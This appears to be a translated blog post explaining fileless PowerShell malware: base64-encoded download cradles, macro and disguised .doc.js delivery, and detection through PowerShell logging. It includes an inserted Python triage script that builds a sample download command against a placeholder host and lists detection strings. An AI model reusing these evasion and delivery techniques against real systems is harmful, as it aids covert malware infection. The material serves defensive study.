The Adventures of Elusive Malware, Part I


With this article we begin a series of posts about fileless malware. Fileless malware, also known as malware that leaves no files behind, usually uses PowerShell on Windows systems to quietly run commands that search for and exfiltrate valuable content. Detecting hacker activity when there are no malicious files is a hard task, because antivirus and many other detection systems work on the basis of signature analysis. The good news is that software capable of this does exist. For example, UBA systems can detect malicious activity in the file system.

When I first started looking into the subject of badass hackers who do not use traditional virus techniques, but only the tools and programs already present on the victim's computer, I had no idea this would become such a popular attack method. Security professionals tell us it has become a trend, and the frightening headlines confirm it. So I decided to do a series of articles on the topic.

The Great and Powerful PowerShell

I wrote about some of these ideas earlier in the PowerShell obfuscation series, but mostly from a theoretical standpoint. Later I came across the Hybrid Analysis website, where you can find malware samples "caught" in the wild. I decided to try using this site to find fileless malware samples, and I succeeded. By the way, if you want to go on your own malware hunting expedition, you will have to be verified by the site so that they know you are working as a white-hat professional. As a security blogger, I was let through without question. I am sure you can be too.

Besides the samples themselves, the site lets you see what these programs do. Hybrid Analysis runs the malware in its own sandbox and monitors system calls, running processes and network activity, and extracts suspicious text strings. For binaries and other executable files, i.e. where you cannot look at the actual high-level code, hybrid analysis decides whether the software is malicious or merely suspicious based on its runtime activity. After that, the sample is already rated.

In the case of PowerShell and other sample scripts (Visual Basic, JavaScript, and so on), I was able to see the code itself. For example, I came across this PowerShell sample:


You can also run PowerShell in base64 encoding to avoid being noticed. Note the use of the Noninteractive and Hidden parameters.

If you have read my posts on obfuscation, you know that the -e option specifies that the content is base64 encoded. By the way, Hybrid Analysis also helps here by decoding everything back. If you want to try decoding base64 PowerShell (hereafter PS) yourself, you need to run this command:

 [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))

Going deeper

I decoded our PS script using this method; below is the text of the program, although slightly modified by me:


Note that the script was bound to an expiration date of September 4, 2017 and passed session cookies.

I wrote about this style of attack in the PS obfuscation series, in which the base64-encoded script itself downloads the missing malware from another site, using the .Net Framework WebClient library object to do the heavy lifting.

Why is that?

For security software that monitors Windows event logs or the firewall, base64 encoding keeps the string "WebClient" from being detected by plain-text pattern matching, which would otherwise guard against such a web request being made. And since all of the malware's "evil" is then downloaded and passed into our PowerShell, this approach therefore lets us evade detection completely. Or so I thought at first.

It turns out that with Windows PowerShell advanced logging enabled (see my article), you will be able to see the downloaded line in the event log. (Like me and others, I think Microsoft should enable this logging level by default.) So, with advanced logging enabled, we will see in the Windows event log the full download request from the PS script, in line with the example we discussed above. It therefore makes sense to turn it on, don't you agree?
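As an added example (not code from the original article), here is a small Python triage routine that does the same job as the decoding command above and the log review just described: it pulls the -e payload out of a logged PowerShell command line, decodes it (base64 over UTF-16LE, as powershell.exe expects), and flags the WebClient/DownloadString strings that base64 had hidden from plain-text matching. The command line and its URL are constructed placeholders.

```python
import base64
import re
from typing import Optional

def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -e expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample resembling a process-creation / PowerShell log entry.
# The payload is harmless and the URL is a placeholder.
SAMPLE_SCRIPT = '(New-Object System.Net.WebClient).DownloadString("http://example.invalid/x.ps1")'
SAMPLE_CMDLINE = ("powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -e "
                  + encode_ps(SAMPLE_SCRIPT))

# -EncodedCommand accepts unique prefixes; -ExecutionPolicy must not match.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Strings that plain-text log matching would look for in an unencoded script.
SUSPICIOUS = ("WebClient", "DownloadString", "DownloadFile", "IEX", "Invoke-Expression")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -e payload, or None if there is no valid one."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def suspicious_indicators(decoded: str) -> list:
    """Case-insensitive check of the decoded script against SUSPICIOUS."""
    low = decoded.lower()
    return [s for s in SUSPICIOUS if s.lower() in low]

def triage(cmdline: str) -> dict:
    """Summarise one logged command line: stealth switches, payload, indicators."""
    decoded = decode_encoded_command(cmdline)
    low = cmdline.lower()
    return {
        "encoded": decoded is not None,
        "hidden_window": "hidden" in low,
        "noninteractive": "-noni" in low,   # any prefix of -NonInteractive
        "decoded": decoded,
        "indicators": suspicious_indicators(decoded) if decoded else [],
    }

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```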

Let's add a few more scenarios

Hackers cleverly hide PowerShell attacks in Microsoft Office macros written in Visual Basic and other scripting languages. The idea is that the victim receives a message, for example from a delivery service, with an attached report in .doc format. You open this document containing the macro, and it ends up launching the malicious PowerShell itself.

Often the Visual Basic script itself is obfuscated so that it freely evades antivirus and other malware scanners. In the spirit of the above, I decided to encode the PowerShell above in JavaScript as an exercise. Below is the result of my work:


Obfuscated JavaScript hides our PowerShell. Real hackers do this once or twice.

This is another technique I have seen floating around the web: using Wscript.Shell to run encoded PowerShell. By the way, the JavaScript itself is the means of delivering the malware. Most versions of Windows have a built-in Windows Script Host, which can itself run JS.
In our case, the malicious JS script is set up as a file with a .doc.js extension. Windows shows only the first suffix, so it will appear to the victim as a Word document.


The JS icon is visible only in the scroll icon. Not surprisingly, many people will open this attachment thinking it is a Word document.

In my example, I set up the PowerShell above to fetch a script from my website. The remote PS script just prints "Evil Malware". As you can see, it is not malicious at all. Of course, real hackers are interested in gaining access to a laptop or server, say, through a command shell. In the next article, I will show how this is done using PowerShell Empire.

I hope that in this first article of the series we have not dived too deeply into the subject. Now I will let you catch your breath, and next time we will start looking at real examples of attacks using fileless malware, without any unnecessary introductory words or preparation.

Source: www.habr.com
